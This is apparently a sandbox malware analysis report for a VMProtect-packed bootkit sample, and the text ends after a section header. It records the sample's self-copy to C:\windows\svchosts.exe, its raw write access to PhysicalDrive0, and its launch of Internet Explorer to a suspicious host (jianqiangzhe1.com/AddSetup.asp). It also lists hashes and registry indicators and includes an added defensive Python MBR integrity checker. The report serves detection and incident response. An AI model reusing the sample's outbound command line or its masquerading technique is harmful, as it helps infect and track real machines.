Malware Analysis Report

2025-08-05 10:49

Sample ID: 241017-b79l3syhpk
Target: d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
SHA256: d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
Tags: bootkit discovery persistence vmprotect
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 7/10
SHA256: d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
Threat level: Shows suspicious behavior

Both detonations below (Windows 7 in behavioral1, Windows 10 in behavioral2) record the same chain. The sample, an unsigned VMProtect-packed PE, writes a copy of itself to C:\windows\svchosts.exe (the dropped file carries the sample's own SHA256; the name is one letter off from the legitimate svchost.exe, which lives in System32) and runs that copy with the argument "auto". The original process opens \??\PhysicalDrive0 for modification, the raw-disk handle through which sector 0 (the MBR) is written. The bootkit signature fires on that write-access open; the bytes written are not captured in this report, so the tag rests on the handle, not on a recovered boot sector. The sample then launches iexplore.exe with the URL http://jianqiangzhe1.com/AddSetup.asp?id=137&localID=232138804165&isqq=3. Only DNS lookups for jianqiangzhe1.com and ip213.com appear in the network logs; no TCP connection to either host was recorded within the capture window.

Two signatures need reading with care. The "Modifies Internet Explorer settings" rows are all written by iexplore.exe / IEXPLORE.EXE during the browser session the sample started, so they are the browser's own first-run state rather than settings changed by the sample. The "Suspicious use of WriteProcessMemory" rows are writes from the sample (PID 2844) into the two processes listed directly beneath it (2672 and 2812), and from the iexplore.exe frame process (2812) into its own tab process (2724, whose SCODEF:2812 argument names that frame); no write into a process outside the sample's own tree was recorded.

Malicious Activity Summary

Tags: bootkit discovery persistence vmprotect

VMProtect packed file
Executes dropped EXE
Writes to the Master Boot Record (MBR)
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Enterprise Matrix V15, mapped from the signatures recorded below:
T1027.002 Obfuscated Files or Information: Software Packing (VMProtect packed file)
T1036.005 Masquerading: Match Legitimate Name or Location (self-copy named C:\windows\svchosts.exe)
T1542.003 Pre-OS Boot: Bootkit (\??\PhysicalDrive0 opened for modification)
T1614.001 System Location Discovery: System Language Discovery (NLS\Language key opened)

Analysis: static1

Detonation Overview

Reported: 2024-10-17 01:48

Signatures

VMProtect packed file

Tags: vmprotect
Description | Indicator | Process | Target
(static match only; no per-event details recorded)

Unsigned PE

Description | Indicator | Process | Target
(static match only; no per-event details recorded)

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-17 01:48
Reported: 2024-10-17 01:50
Platform: win7-20240903-en
Max time kernel: 150s
Max time network: 148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\windows\svchosts.exe | N/A

VMProtect packed file

Tags: vmprotect
Description | Indicator | Process | Target
(6 matches; no per-event details recorded)

Writes to the Master Boot Record (MBR)

Tags: bootkit persistence
Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\windows\svchosts.exe | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A
File opened for modification | C:\windows\svchosts.exe | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A

System Location Discovery: System Language Discovery

Tags: discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\svchosts.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A

Modifies Internet Explorer settings

Tags: adware spyware
Every row below is written by Internet Explorer itself (see the Process column) during the browser session the sample started with a URL. All keys sit under \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\; that prefix is omitted from the Indicator column.
Description | Indicator | Process | Target
Key created | BrowserEmulation\LowMic | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | LowRegistry | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf6000000000200000000001066000000010000200000009a67834300f74b07edc4bdcf31f39b8fb0c2263fc5a329710b82634fcdaac33b000000000e800000000200002000000036cd28e5bf2c4a661ad37c7caa82364c2aa87017c9798ef600447e3b864388b420000000a95c904c7e50b776167773f03e84b4650235e906c7bc5e321db6bff60253f25a400000007d85e7129115c4c337556353b4c333b2debf976d0162f6a4f0d85ca81211dbac16325aea0a9d9a891d9ceb460a2ec4fa85cf333a84e85f13221fe35c91d4c2ba | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | InternetRegistry | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | LowRegistry\DontShowMeThisDialogAgain | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | PageSetup | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Main | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | IETld\LowMic | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | Main\CompatibilityFlags = "0" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | Recovery\PendingRecovery\AdminActive = "1" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | SearchScopes | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | TabbedBrowsing\NewTabPage | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | IntelliForms | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Toolbar\WebBrowser | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Main\WindowsSearch | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | Recovery\AdminActive | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | SearchScopes\DownloadRetries = "3" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | DomainSuggestion | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | Recovery\AdminActive\{E4032D81-8C29-11EF-999E-E67A421F41DB} = "0" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (str) | Main\WindowsSearch\Version = "WS not running" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Recovery\PendingRecovery | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf600000000020000000000106600000001000020000000d7fa00ffffbc4f20f3be9d5cf3eac55e2d2a2fe81c716674cfef3aede8ff022a000000000e8000000002000020000000bd56c188383c84508a8ccdb4adc2521f227acf090642b24d4b84890f5e7e347690000000d0e53a9672ebd63c0ceae2081ea9979328bf6e72b3c8ff49b9034b34caeb207a8b8f659ee42aab045fb6830c4fbc82c026e87f0411c179b8480fa327b75733e97eaca682258996b5922ec47e6d94d9af5d385050447fedcd76679f7cfd259c8f71fbec54d21e33a6fa5ab7ceafe598dd00712ace2b3a60d23e690ac2d3f0c4747b85f562eb2859b784b62f796a49a3e4400000000f09d70897a662edcd7e80dcf186b84897f740b840a969ab575c161e678e1ea738bc12e0f2938f3b83c418b61198075f0c6528aaa75607a643e4d066c98b4e24 | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | DomainSuggestion\NextUpdateDate = "435291570" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Toolbar | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Zoom | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (str) | Main\FullScreen = "no" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | TabbedBrowsing\NTPFirstRun = "1" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | TabbedBrowsing\NewTabPage\LastProcessed = 907392b83620db01 | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | GPU | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | LowRegistry\DOMStorage | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | Recovery\PendingRecovery\AdminActive = "0" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | TabbedBrowsing | C:\progra~1\Intern~1\iexplore.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\progra~1\Intern~1\iexplore.exe | N/A
N/A | N/A | C:\windows\svchosts.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2844 wrote to memory of 2672 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | C:\windows\svchosts.exe
PID 2844 wrote to memory of 2812 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | C:\progra~1\Intern~1\iexplore.exe
PID 2812 wrote to memory of 2724 (4 events) | N/A | C:\progra~1\Intern~1\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

PIDs are taken from the WriteProcessMemory rows above and the memory dump names below.

C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe (PID 2844, the submitted sample)

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

C:\windows\svchosts.exe (PID 2672, the dropped self-copy)

C:\windows\svchosts.exe auto

C:\progra~1\Intern~1\iexplore.exe (PID 2812, Internet Explorer frame process)

C:\\progra~1\\Intern~1\\iexplore.exe http://jianqiangzhe1.com/AddSetup.asp?id=137&localID=232138804165&isqq=3

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2724, Internet Explorer tab process; SCODEF:2812 names its frame process)

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2812 CREDAT:275457 /prefetch:2

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | jianqiangzhe1.com | udp
US | 8.8.8.8:53 | ip213.com | udp
US | 204.79.197.200:443 | ieonline.microsoft.com | tcp (3 connections)

Files

memory/2844-0-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2844-1-0x0000000000400000-0x0000000000431000-memory.dmp

C:\Windows\svchosts.exe (same SHA256 as the submitted sample: a byte-for-byte self-copy)

MD5 43c6fd6fc51136632b47a8672de41034
SHA1 a22897d94f9d1ef123cbb1e372a619113327c214
SHA256 d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
SHA512 f64b041b5a6afb4412496b526be0059814e4aac587764b36aa5b553ebe9d92533a162f484adc4b705853d65f59f262a91ad8888b84f6c1b7ac1099725fdd4e6a

memory/2844-11-0x00000000001C0000-0x00000000001F1000-memory.dmp

memory/2672-12-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2812-15-0x0000000003200000-0x0000000003210000-memory.dmp

memory/2844-20-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2672-21-0x0000000000320000-0x0000000000322000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabF93F.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarF9A1.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f79e56b22c0987748b6707649d0ff99
SHA1 684f7bfdaf190392d99e7b1ed4c1c8fc047cfbe0
SHA256 547895acc5577dc07b2827c5a5687e143a2dd961270778cd598fd3ff6e7feb7a
SHA512 dc2b3d06e727e5613bb3f7f6b7dd0f3f5f6550bb55da4ef05de87e264884e6304f3717fda3b694470a9e9ba8df779573189090bb5d4c622a2b0fbce31fc2a78a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c88a74151e16cd71c049eaa7c5353294
SHA1 8948b5326ed611047f88af58284966b740b9d10f
SHA256 071a496c481f70249d25c261e1a1772b6b8fb065082985f8842082901b57d991
SHA512 1487d5009a8f043456ee6ea17a56b5cf058f0ab2e27259faca664e73286b3779a38ec4b3d62a2f29a24a123b35d07ac50428fac2f6a440e4a95364cd87131fe6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8591bfb7acd9a74512dc4fa6fa5f3142
SHA1 5d06407c8f8334586759a4a84b60bac34fc987cd
SHA256 70cf0a12e6c3edcde7393624cde7c769509ad32d64c860debe7f217d3694beb4
SHA512 2b92a2d8185749ec723e5a83b6cec0e712eaf877abe119879dde1cb83c45159dc34e0c2eed6f5985cb31a21e12dc3cb5d78d84ca8df6dbe034edc570255546fc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dd0faaafa983552b9958a35b22fabf89
SHA1 4e120f3f8af0865246b48d91f4faa0e2781e53a6
SHA256 986d0595cdfe708a8490e5208654cee15beee2e9e2fb2b23485c37d2ed1d041e
SHA512 390d0f0822e5b12291d9640661633cbadbd65f9df2187dfb49707fb9a888f8d898f54d64418eee4462b7e9513ee7fbd992ab4adc95590fb7dcd03880a0f3ef58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 863540eeebd4a24ef6b46ea16e84c377
SHA1 cdaf1cede948118fb912ee8114f90b5398b060e9
SHA256 3ea0d3198760262a1096a772016a77717ea0901ced5efb0fabca7cc1b63a16cd
SHA512 f3905cb680f43518ffd171d0d4d33f0b221ea55144300b2c1b7231f0b57673bb91a3b4f0549faee803b2e3beb2fca1ce0a00ca7f4c33b2a3898ab69e7f4f19ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 36c2a0e0f79b15745d837edcb876ca1f
SHA1 f61d6dc9edb1c82fea1030256e89d965bbb295bf
SHA256 f41309a12612c4ff403e718ad8766acb3d9be5316e350a93450415f2a7b88df1
SHA512 1a667f3cb0a7df6a63bcfce659311cbbc274c08ea6dcc6e988efd6e5f0c30d6368e5d781661b21838f65d0130b40b2ccd63a9150118e0856c084724510982538

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f6587acdcc479b859b83e84e38dec6a
SHA1 caa5bf7409caaf89fcd3a5921784c86c7200f60e
SHA256 ac4807a63df04a78e3af350d02a0c090439d1ed66ec92f1c5dc563e770ab6d93
SHA512 5c568b17fc3794de729fe63e546ae3780233155cec5c5bbf8969aec0897205d64c3a576b8a59b7374640b8a197eca4134107086ca694d441438afeb00d66a3ea

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 98c4c46c149ab4c45203beedd151bc45
SHA1 cfc2e5832ce2f3708b9ee9e437961dd78afb3c99
SHA256 ea37c828efae6c5ccee563145ed5b6be61e488176c2560422ad059b871d709f6
SHA512 3be675b13f23cc78b0266611bdd55033e46fdb73cc3318b980a80a9ea822c2df06464739454a89f50c61da2039ddc62d44dfbf4981897f5d981e7e820a855d31

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8168def6641ec09741fb7fdd9ce754f0
SHA1 2ccada6abeb00a14febd23ec3cb0c7b5f7842632
SHA256 78a67b704194ad9827369907930320bdd74b9948bf7dc5f1a0ae6fc8ff3141cc
SHA512 41ae205699764d0331b8ece9b0fab281e1eb1ff69c7a016b6e8dba0123c63e7a552aeb82a547b3411fc479c1d0ad5eebb6e5b45495ce77465044e61d30b19ddc

memory/2672-450-0x0000000000400000-0x0000000000431000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e2599cd85e9b6211afa8be29f04a2820
SHA1 8988eb07b6f0c040f3533e38ba967bde5092b207
SHA256 e5073ecfcd88368d819179e210630dd0635549ba9bfa2e5e6d83d445e57877ef
SHA512 e821fc737d3fb17e62748a2ba36b2f8399d78b45ce6136b4e1645394f3d3fbf7d215267a10185158ad36c7a64044924762ab1b64cf5a61edbad7d55a34f7847a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 affbb1a670f0b1e795e882dc7ebda2a5
SHA1 a651114465e21c43c37491b08f10ef8dfbe401f7
SHA256 f7434f0b34f632d4ea64a9aff751fec10f73468e766d94255301ffe91276001b
SHA512 519ba8b5d44f1d286de2e5019271670ef614ef595618f11f3cae261418fc3677387fafa001c472ffd1e962fc4ad0489479c10348cfc172bf44ecb08d5ec826a3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0fbe089e0f60d37edbc8bac72d3c864f
SHA1 6e31d9c63748cd20a3bc95fc779e4a6256b5c9b4
SHA256 d041d8a06fc5c41a5ffb516a3a7cb5947a5317f8e9ff797deb4078f1dc54d258
SHA512 e150e77b04d17fb7e2ccccabb9a08f3eacc5f4903b20178d454f9f8ed8d094de24817b8e679de898ca0bb25e93441ad417ca1104cf32022768e106906025fdeb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 98cdb8289787d7c109ace76e86d8abfe
SHA1 a4eca105bcf37a3583f21cce5e9052fe707dc168
SHA256 9fadb74e08a0354a5f9eb524c63b97b3e9db29c726511bc69714adb89452a6d9
SHA512 cc0c22eabfb9954bcec943fe66fbd6b38d5174f1ee2440f2c60b2f3841c3b89776d7d2c32355b69a35468e30909b0ead148b88d5a00ecf2d0547bf74d7b1e114

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab85ee73c19d2a476a0dfc8afe9b1451
SHA1 45225162bda702e40957dc3824c61460f72bde75
SHA256 de74b91ee9c9d0bf253ea5b892b9ddd6a98e3950d28a69a09802329fac9124b1
SHA512 dc9f64bcc335f49ed15515bc29dd6295962ae8d654a75ae54f242832e2358aefe1fc075440dfe2b8ea90d287fc97f64f712945a1d8004ce6370850f325b94958

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 770283ce670ffc6524a74876c4eb22b8
SHA1 c5105143c65dea1661f03ab23a424ed7553e2b04
SHA256 429c60203c6120e195c88d7531161c87f57ab5e038937815955a3015a6ff3e8e
SHA512 fbfd15ff937213b0f519299a8385d89f22fc2e43fab1e369558ae8458b1310c8af6d83e5a0d5a267fa3a6462a4ffa193257421a0420d6f966108872bd476ed35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0ce5f6bae519dc3a2e31b87437cb269f
SHA1 c436309010b605e858aebc36277104246e89476c
SHA256 fe8887f60a677201a923fb8f950db1ecac35cabb0beedf399e38e05ada4cc038
SHA512 0fc74e047629c107b83a333f39490f65c428793429c2cd58a459ab2060a904f63865f1924bda5f5b1f012890b0f1a3a459162a4641763ed09eed5a6f34c7b32a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a52cf5fcd2caa3920172fa6570992c3f
SHA1 b36002b33b6944b39e5b01a8d08ace5be563d7eb
SHA256 7ae39795746aab4a33176f55c55d54b1899c7d1959cba08cdd8d3a9dcb632059
SHA512 e0acd39b007e6f5d2389513e76b83fa113602358e084623ee190f062a428b3fae88a39f17686f29a33ea291ae2d91db8b8175fe444941041ed380d3f6e269570

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 54630075ba50dfc2b2ee9990ac6e6abe
SHA1 7414d0ededc50174e05ed4f766cf55c260d50813
SHA256 87ac21d81143cb4a9d2dccf6ab0a9ac39476528dd4371364b6af2f3dc7f25f84
SHA512 900493c73eac8f31a57728b8ac0d1b47edb17bd31d943c59bce56bd83d816e4d2833a0df5a1f67c32af2c90449297ea3a62024952c59c5fb39f30c298cb5f67a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 26814d8d9aa0b6d2f2b0157111e5d8be
SHA1 dce35cbd572c760c9d2f67366b165a06819679d0
SHA256 5cd2bbd4010ccdcb6675a27fe77d8ab54b94c19a4ab4d1d8f9ce98de295d9f2f
SHA512 7e8fe1377aab38cb4a86de362df74c3a9b03638bc7c327b56d19d0ac7c2195996b88d96cc4789147e24b15988b36ae83973fe4674a32f0e5768a9f449fb70112

Analysis: behavioral2

Detonation Overview

Submitted: 2024-10-17 01:48
Reported: 2024-10-17 01:50
Platform: win10v2004-20241007-en
Max time kernel: 150s
Max time network: 130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\windows\svchosts.exe | N/A

VMProtect packed file

Tags: vmprotect
Description | Indicator | Process | Target
(6 matches; no per-event details recorded)

Writes to the Master Boot Record (MBR)

Tags: bootkit persistence
Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A
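In both behavioral1 and behavioral2 this signature records only the write-access open of \??\PhysicalDrive0, not the bytes written. The check a responder runs on the detonated VM, or better on an offline image of its disk, is to pull sector 0 and compare it with a known-good copy field by field: boot signature, partition table, and the 440 bytes of boot code. The script below is an added example written for this page; it is not the sandbox's code and not the sample's. The two sectors it builds are constructed test data (a plausible prologue padded with NOPs, and a far-jump stub standing in for a loader), not a dump from this detonation. Reading \\.\PhysicalDrive0 directly needs an elevated prompt on Windows.

```python
"""MBR integrity check for a PhysicalDrive0 write like the one flagged above.

Added example, not part of the sandbox report and not the sample's code. The
sectors built at the bottom are constructed for illustration: a baseline and a
copy whose boot code was replaced while the partition table and the 0x55AA
signature were kept, which is the footprint an MBR bootkit leaves.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

MBR_SIZE = 512
BOOT_CODE_LEN = 440      # boot code occupies offsets 0x000-0x1B7
DISK_SIG_OFF = 440       # 4-byte disk signature followed by 2 reserved bytes
PART_TABLE_OFF = 446     # four 16-byte partition entries
BOOT_SIG_OFF = 510       # 0x55 0xAA
ENTRY_FMT = "<B3xB3xII"  # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count


@dataclass
class PartitionEntry:
    bootable: bool
    type_id: int
    lba_start: int
    sectors: int


def parse_partition_table(mbr: bytes) -> List[PartitionEntry]:
    """Decode the four primary partition entries."""
    entries = []
    for i in range(4):
        status, ptype, lba, count = struct.unpack_from(ENTRY_FMT, mbr, PART_TABLE_OFF + 16 * i)
        entries.append(PartitionEntry(status == 0x80, ptype, lba, count))
    return entries


def check_mbr(mbr: bytes, baseline: Optional[bytes] = None) -> List[str]:
    """Return findings; an empty list means nothing suspicious.

    With a baseline, boot code and partition table are compared separately: a
    bootkit normally rewrites the former and preserves the latter so the
    machine still boots, so "boot code differs, table identical" is the tell.
    """
    if len(mbr) != MBR_SIZE:
        return [f"unexpected MBR length {len(mbr)}"]
    findings = []
    if mbr[BOOT_SIG_OFF:] != b"\x55\xAA":
        findings.append("boot signature 0x55AA missing")
    for i in range(4):
        status = mbr[PART_TABLE_OFF + 16 * i]
        if status not in (0x00, 0x80):  # only inactive/active are valid status bytes
            findings.append(f"partition {i}: invalid status byte 0x{status:02x}")
    if sum(p.bootable for p in parse_partition_table(mbr)) > 1:
        findings.append("more than one active partition")
    if baseline is not None:
        if mbr[PART_TABLE_OFF:BOOT_SIG_OFF] != baseline[PART_TABLE_OFF:BOOT_SIG_OFF]:
            findings.append("partition table differs from baseline")
        if mbr[:BOOT_CODE_LEN] != baseline[:BOOT_CODE_LEN]:
            first = next(i for i in range(BOOT_CODE_LEN) if mbr[i] != baseline[i])
            findings.append(f"boot code differs from baseline starting at offset 0x{first:03x}")
    return findings


def read_mbr(device: str = r"\\.\PhysicalDrive0") -> bytes:
    """Read sector 0 of a raw disk (elevated prompt needed on Windows).
    Pass the path of a disk image instead to run against a snapshot offline."""
    with open(device, "rb") as fh:
        return fh.read(MBR_SIZE)


def build_mbr(boot_code: bytes, disk_sig: int, partitions: List[Tuple[int, int, int, int]]) -> bytes:
    """Assemble a sector from its parts; used here only to construct test data."""
    buf = bytearray(MBR_SIZE)
    buf[:len(boot_code)] = boot_code
    struct.pack_into("<IH", buf, DISK_SIG_OFF, disk_sig, 0)
    for i, (status, ptype, lba, count) in enumerate(partitions):
        struct.pack_into(ENTRY_FMT, buf, PART_TABLE_OFF + 16 * i, status, ptype, lba, count)
    buf[BOOT_SIG_OFF:] = b"\x55\xAA"
    return bytes(buf)


# Constructed baseline: the common "xor ax,ax / mov ss,ax / mov sp,7C00h" prologue
# padded with NOPs, one active NTFS (0x07) partition starting at LBA 2048.
ONE_NTFS = [(0x80, 0x07, 2048, 204800)]
BASELINE_MBR = build_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 64, 0x1234ABCD, ONE_NTFS)

# Constructed post-infection sector: a far jump into a stub replaces the boot code;
# disk signature, partition table and 0x55AA are untouched.
TAMPERED_MBR = build_mbr(b"\xea\x00\x7c\x00\x00" + b"\xcc" * 64, 0x1234ABCD, ONE_NTFS)

if __name__ == "__main__":
    for label, sector in (("baseline", BASELINE_MBR), ("tampered", TAMPERED_MBR)):
        print(label, check_mbr(sector, BASELINE_MBR) or "clean")
```

A boot-code diff with an unchanged partition table is the pattern to look for: the bootkit has to keep the table intact for Windows to keep booting, so it overwrites the first 440 bytes and typically stashes the original sector elsewhere on the disk. Prefer reading from an offline image of the detonated disk; some bootkit families filter reads of sector 0 from inside the running system.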

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\windows\svchosts.exe | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A
File opened for modification | C:\windows\svchosts.exe | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A

System Location Discovery: System Language Discovery

Tags: discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\svchosts.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A

Modifies Internet Explorer settings

Tags: adware spyware
